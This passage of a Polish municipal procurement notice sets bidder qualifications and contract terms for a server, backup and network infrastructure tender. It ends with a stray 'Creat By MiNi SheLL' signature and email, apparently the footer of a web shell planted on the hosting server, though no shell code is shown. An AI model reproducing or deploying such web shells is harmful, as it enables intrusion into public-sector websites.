spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej jeśli wykaże, że:<br/>	w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej dwa zamówienia, które polegały na dostawie i wdrożeniu systemów informatycznych w szczególności sprzętu serwerowo-backupowego, urządzeń bezpieczeństwa sieciowego, przełączników sieciowych o wartości co najmniej 200 tys. zł brutto każde, w tym jedno zamówienie obejmowało również wyposażenie techniczne serwerowni.<br/>Zamawiający przez „zamówienie” rozumie jedną, pisemną umowę odpłatną – a nie sumę pojedynczych ustnych bądź pisemnych zleceń realizowanych na rzecz tego samego podmiotu.<br/><br/>W przypadku robót, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/><br/>	działa w oparciu o System Zarządzania Jakością zgodny z wymaganiami ISO 9001 potwierdzony certyfikatem w zakresie świadczenia usług serwisowych,<br/><br/>	dysponuje co najmniej 1 osobą, która będzie pełnić funkcję kierownika projektu, która: <br/>•	posiada co najmniej 3-letnie doświadczenie zawodowe w branży informatycznej, w podmiotach realizujących projekty informatyczne,<br/>•	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział, jako kierownik projektu, w co najmniej 2 projektach informatycznych, zakończonych do dnia składania ofert, polegających na budowie systemów informatycznych o wartości co najmniej 200 tys. zł brutto.<br/>•	wykształcenie wyższe magisterskie na kierunku Informatyka lub pokrewnym;<br/>•	umiejętności zwinnego zarządzania projektem potwierdzone aktualnym certyfikatem AgilePM® Practitioner lub Project Management Professional (PMP) lub równoważnym;<br/>•	wiedzę z zakresu zarządzania bezpieczeństwem informacji potwierdzoną certyfikatem Administrator Bezpieczeństwa Informacji lub Audytor Wiodący Systemu Zarządzania Bezpieczeństwem Informacji wg normy PN-EN ISO/IEC 27001 lub równoważnym;<br/>•	certyfikat dotyczący bezpieczeństwa wydany przez producenta zaoferowanego rozwiązania;<br/><br/>	dysponuje co najmniej 1 osobą, która będzie pełnić funkcję architekta systemów informacyjnych, która: <br/>•	posiada co najmniej 3-letnie doświadczenie zawodowe w branży informatycznej, w podmiotach realizujących projekty informatyczne,<br/>•	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział, jako architekt systemu informatycznego, w co najmniej 2 projektach informatycznych, zakończonym do dnia składania ofert, którego przedmiotem było zaprojektowanie, wykonanie i wdrożenie systemu informatycznego, w ramach którego zintegrowane zostały wewnętrzne (eksploatowane przez zamawiającego) i/lub zewnętrzne (eksploatowane przez inne podmioty) systemy informatyczne, o wartości projektu co najmniej 200 tys. zł brutto.<br/>•	wykształcenie wyższe magisterskie na kierunku Informatyka lub pokrewnym;<br/>•	umiejętności potwierdzone aktualnym certyfikatem Solution Architect wydanym przez jednego z leaderów w raporcie 2024 Gartner® Magic Quadrant™ for Enterprise Backup and Recovery Software Solutions lub równoważny;<br/><br/>	dysponuje co najmniej 1 osobą, która będzie pełnić funkcję architekta inżyniera sieci, która: <br/>•	posiada co najmniej 3-letnie doświadczenie zawodowe w branży informatycznej, w podmiotach realizujących projekty informatyczne,<br/>•	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział jako inżynier lub wdrożeniowiec, w co najmniej 2 projektach informatycznych, zakończonych do dnia składania ofert, których przedmiotem było zaprojektowanie, wykonanie i wdrożenie systemu sieci LAN o wartości co najmniej 100 tys. zł brutto.<br/>•	wykształcenie wyższe magisterskie na kierunku Informatyka lub pokrewnym;<br/>•	umiejętności potwierdzone aktualnym certyfikatem dotyczącego zaawansowanego routingu i switchingu na poziomie co najmniej Professional lub Advanced wydanym przez jednego z leaderów będącego raporcie 2024 Gartner® Magic Quadrant™ for Enterprise Wired and Wireless LAN Infrastructure lub równoważnym;<br/>•	umiejętności potwierdzone aktualnym certyfikatem Security na poziomie co najmniej Associate wydanym przez jednego z vendorów w raporcie 2022 Gartner® Magic Quadrant™ for Network Firewalls lub równoważnym;<br/><br/>	dysponuje co najmniej 1 osobą, która będzie pełnić funkcję inżyniera ds. sprzętu serwerowego, która: <br/>•	posiada co najmniej 3-letnie doświadczenie zawodowe w branży informatycznej, w podmiotach realizujących projekty informatyczne,<br/>•	w ciągu ostatnich 3 lat przed terminem składania ofert brał udział jako inżynier lub wdrożeniowiec, w co najmniej 2 projektach informatycznych, zakończonych do dnia składania ofert, których przedmiotem było zaprojektowanie, wykonanie i wdrożenie sprzętu serwerowego, macierzy, sieci LAN oraz urządzeń bezpieczeństwa sieciowego o wartości co najmniej 200 tys. zł brutto.<br/>•	wykształcenie wyższe magisterskie na kierunku Informatyka lub pokrewnym;<br/>•	umiejętności potwierdzone aktualnym certyfikatem systemów serwerowych wydanym przez jednego z producentów serwerów;<br/>•	umiejętności potwierdzone aktualnym certyfikatem pamięci masowych na poziomie co najmniej Professional lub Advanced wydanym przez jednego z leaderów będącego w raporcie 2023 Gartner® Magic Quadrant™ for Primary Storage lub równoważnym;<br/>•	umiejętności potwierdzone aktualnym certyfikatem dotyczącym backupu na poziomie co najmniej Professional lub Advanced wydanym przez jednego z leaderów będącego w raporcie 2024 Gartner® Magic Quadrant™ for Enterprise Backup and Recovery Software Solutions lub równoważnym;<br/><br/>Zamawiający dopuszcza możliwość łączenia w/w funkcji przez jedną osobę .<br/>Zamawiający dopuszcza zmianę ww. osób w trakcie realizacji zamówienia, pod warunkiem posiadania wymaganych uprawnień oraz doświadczenia nie gorszego niż osoby wskazane na etapie składania ofert oraz zachowania ciągłości w prowadzeniu prac na każdym etapie realizacji umowy.<br/>Personel, podany przez Wykonawcę w ofercie nie wyczerpuje wymagań dla rzetelnego wypełnienia zobowiązań wynikających z przedmiotu zamówienia i winien być traktowany, jako minimalne wymogi Zamawiającego dla spełnienia warunków udziału w postępowaniu o udzielenie zamówienia. Mając na uwadze termin wykonania zamówienia oraz jego zakres, wykonawca musi samodzielnie ocenić ilość niezbędnych zasobów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, którego wzór stanowi Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-	wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich ilości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, którego wzór stanowi załącznik nr 8 do SWZ,<br/>-	wykaz osób skierowanych przez Wykonawcę do realizacji przedmiotowego zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania przedmiotu zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, którego wzór stanowi Załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu wykazania spełniania wymagań, o których mowa w rozdziale VI SWZ, ust. 1, Wykonawca zobowiązany jest wraz z ofertą przedłożyć przedmiotowe środki dowodowe w postaci uzupełnionego odpowiednio Załącznika Nr 1 do Formularza ofertowego i wymaganych w jego treści dokumentów. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opis zaoferowanego sprzętu i oprogramowania zawarty w Załączniku Nr 1 do Formularza ofertowego oraz wymagane w jego treści dokumenty. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, – zgodnie z załącznikiem nr 2A do SWZ (jeśli dotyczy);<br/>2) zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy – zgodnie z załącznikiem nr 3 do SWZ (jeżeli dotyczy);<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy – jeśli umocowanie nie wynika z dokumentów rejestrowych,<br/>4) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - jeśli umocowanie nie wynika z dokumentów rejestrowych (jeśli<br/>dotyczy),<br/>5) pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp – jeśli umocowanie nie wynika z dokumentów rejestrowych (jeśli dotyczy),<br/>6) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - zgodnie z załącznikiem nr 7 do SWZ (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>1) postępowania o zamówienie publiczne, którego dotyczy,<br/>2) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w art.<br/>125 ust 1 ustawy Pzp, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>7. W przypadku, o którym mowa w ust. 4 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (oświadczenie, o<br/>którym mowa w art. 117 ust. 4 ustawy Pzp stanowi Załącznik nr 7 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje, zgodnie z art. 455 ust. 1 ustawy Pzp, możliwość dokonania zmian Umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, polegających w szczególności na: <br/>1)	w przypadku urzędowej zmiany stawki podatku od towarów i usług (VAT), jeżeli ta zmiana powodować będzie zwiększenie lub zmniejszenie wynagrodzenia należnego Wykonawcy – dopuszcza się odpowiednio zwiększenie lub zmniejszenie wynagrodzenia Wykonawcy o wynikającą z tych zmian różnicę w kwocie podatku VAT,<br/>2)	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu umowy - dopuszcza się zmianę terminu wykonania Umowy adekwatną do wprowadzonych zmian przepisów,<br/>3)	w przypadku zaistnienia, po zawarciu Umowy, siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem Umowy, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności - dopuszcza się zmianę terminu wykonania Umowy adekwatną do zaistniałej sytuacji. Za siłę wyższą warunkującą zmianę Umowy, uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej,<br/>4)	pojawienie się na rynku urządzenia producenta sprzętu nowszej generacji lub nowej wersji oprogramowania, o lepszych parametrach i/lub pozwalających na zaoszczędzenie kosztów eksploatacji pod warunkiem, że te zmiany nie spowodują zwiększenia ceny,<br/>5)	w przypadku zmiany przez Producenta Oprogramowania, po zawarciu Umowy, warunków jego licencjonowania - dopuszcza się możliwość zmiany tego Oprogramowania w stosunku do wersji podanej w Ofercie Wykonawcy pod warunkiem, że nie spowodowuje to podwyższenia ceny Przedmiotu umowy oraz obniżenia jego parametrów funkcjonalnych wynikających z Oferty Wykonawcy,<br/>6)	w przypadku ujawnienia się powszechnie występujących wad oferowanego urządzenia Zamawiający dopuszcza zmianę w zakresie przedmiotu Umowy polegającą na zastąpieniu danego produktu produktem zastępczym, spełniającym wszelkie wymagania przewidziane w SWZ dla produktu zastępowanego, rekomendowanym przez producenta lub Wykonawcę w związku z ujawnieniem wad<br/>7)	w przypadku konieczności dostarczenia Sprzętu komputerowego innego niż określony w Umowie, spowodowanej zakończeniem jego produkcji lub dystrybucji na terenie Rzeczypospolitej Polskiej - dopuszcza się możliwość zmiany tego Sprzętu komputerowego, pod warunkiem, że nie spowodowuje to podwyższenia ceny Przedmiotu umowy oraz obniżenia jego parametrów technicznych i funkcjonalnych wynikających z Oferty Wykonawcy,<br/>8)	zmiana oferowanych przez Wykonawcę urządzeń lub oprogramowania w sytuacji, gdy producent lub jego przedstawiciel na terytorium Rzeczpospolitej Polskiej (osoba trzecia) nie będzie mógł dostarczyć oferowanych przez Wykonawcę urządzeń lub oprogramowania w terminie wyznaczonym w Umowie<br/>9)	zmiany danych adresowych Wykonawcy lub Zamawiającego (tj. np. zmiana siedziby, adresu, nazwy),<br/>10)	zmiany osób wyznaczonych przez Strony w Umowie do jej realizacji,<br/>11)	zaistnienia omyłki pisarskiej lub rachunkowej w treści Umowy.<br/>3.	Inicjatorem zmian Umowy może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie do drugiej Strony w okresie obowiązywania Umowy, zawierające opis proponowanych zmian i ich uzasadnienie.<br/>4.	W przypadku zaistnienia sytuacji, o której mowa w ust. 1 pkt 4-8 Wykonawca zobowiązuje się powiadomić o tym fakcie Zamawiającego z wyprzedzeniem umożliwiającym aneksowanie Umowy, w trybie niewywołującym opóźnienia w terminach umownych.<br/><br/><br/>Z uwagi na ograniczoną wartość pola, która nie może być dłuższa niż 4000 znaków Zamawiający informuje, że pozostałe informacje w zakresie zmian umowy, ich rodzaju i zakresu oraz warunki wprowadzenia szczegółowo określono w projekcie umowy, który stanowi załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminamalyplock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-28 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com